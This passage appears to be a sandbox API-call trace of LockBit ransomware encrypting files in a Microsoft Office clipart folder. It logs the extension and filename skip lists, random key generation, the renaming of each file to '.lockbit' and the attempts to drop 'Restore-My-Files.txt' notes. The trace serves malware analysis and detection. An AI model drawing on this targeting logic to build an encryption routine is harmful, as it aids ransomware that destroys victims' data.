DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198022.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198022.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.393] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.393] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.394] free (_Block=0x1fa2ed8) [0150.394] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198022.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.394] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.395] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de50900, ftCreationTime.dwHighDateTime=0x1bd8464, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7de50900, ftLastWriteTime.dwHighDateTime=0x1bd8464, nFileSizeHigh=0x0, nFileSizeLow=0x3cce, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198025.WMF", cAlternateFileName="")) returned 1 [0150.395] lstrcmpiW (lpString1=".", lpString2="J0198025.WMF") returned -1 [0150.395] lstrcmpiW (lpString1="..", lpString2="J0198025.WMF") returned -1 [0150.395] PathFindExtensionW (pszPath="J0198025.WMF") returned=".WMF" [0150.395] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.395] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.396] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.396] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.397] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198025.WMF") returned 1 [0150.397] lstrcmpiW (lpString1="ntldr", lpString2="J0198025.WMF") returned 1 [0150.397] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198025.WMF") returned 1 [0150.397] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198025.WMF") returned -1 [0150.397] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198025.WMF") returned -1 [0150.397] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198025.WMF") returned 1 [0150.397] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198025.WMF") returned -1 [0150.397] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.397] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198025.WMF") returned=".WMF" [0150.398] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.398] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.398] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.399] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.399] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.399] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.399] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.399] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.399] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.399] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198025.WMF.lockbit") returned 72 [0150.399] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198025.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198025.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.400] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.400] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.400] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15566) returned 1 [0150.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.402] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198025.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198025.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.408] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.408] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.409] free (_Block=0x1fa2ed8) [0150.409] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198025.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.409] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.409] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.409] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb570900, ftCreationTime.dwHighDateTime=0x1bd9f2f, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcb570900, ftLastWriteTime.dwHighDateTime=0x1bd9f2f, nFileSizeHigh=0x0, nFileSizeLow=0xd6b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198102.WMF", cAlternateFileName="")) returned 1 [0150.409] lstrcmpiW (lpString1=".", lpString2="J0198102.WMF") returned -1 [0150.409] lstrcmpiW (lpString1="..", lpString2="J0198102.WMF") returned -1 [0150.409] PathFindExtensionW (pszPath="J0198102.WMF") returned=".WMF" [0150.409] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.409] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.410] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.411] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.411] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.412] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.412] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.412] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.412] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.412] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.412] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.412] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198102.WMF") returned 1 [0150.412] lstrcmpiW (lpString1="ntldr", lpString2="J0198102.WMF") returned 1 [0150.412] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198102.WMF") returned 1 [0150.412] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198102.WMF") returned -1 [0150.412] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198102.WMF") returned -1 [0150.412] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198102.WMF") returned 1 [0150.412] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198102.WMF") returned -1 [0150.412] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.412] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198102.WMF") returned=".WMF" [0150.412] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.412] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.412] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.413] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.414] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.414] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.414] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.414] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.414] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.414] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.414] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198102.WMF.lockbit") returned 72 [0150.414] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198102.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198102.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0150.415] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.415] malloc (_Size=0x40068) returned 0x3d70450 [0150.415] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=54964) returned 1 [0150.415] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0150.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0150.417] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.423] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198102.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198102.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.423] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.423] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.424] free (_Block=0x1fa2ed8) [0150.425] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198102.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.425] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.425] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.425] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcce00a00, ftCreationTime.dwHighDateTime=0x1bd9fdf, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcce00a00, ftLastWriteTime.dwHighDateTime=0x1bd9fdf, nFileSizeHigh=0x0, nFileSizeLow=0xa520, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198113.WMF", cAlternateFileName="")) returned 1 [0150.425] lstrcmpiW (lpString1=".", lpString2="J0198113.WMF") returned -1 [0150.425] lstrcmpiW (lpString1="..", lpString2="J0198113.WMF") returned -1 [0150.425] PathFindExtensionW (pszPath="J0198113.WMF") returned=".WMF" [0150.425] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.425] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.426] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.426] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.427] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198113.WMF") returned 1 [0150.427] lstrcmpiW (lpString1="ntldr", lpString2="J0198113.WMF") returned 1 [0150.427] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198113.WMF") returned 1 [0150.427] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198113.WMF") returned -1 [0150.427] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198113.WMF") returned -1 [0150.427] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198113.WMF") returned 1 [0150.428] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198113.WMF") returned -1 [0150.428] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.428] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198113.WMF") returned=".WMF" 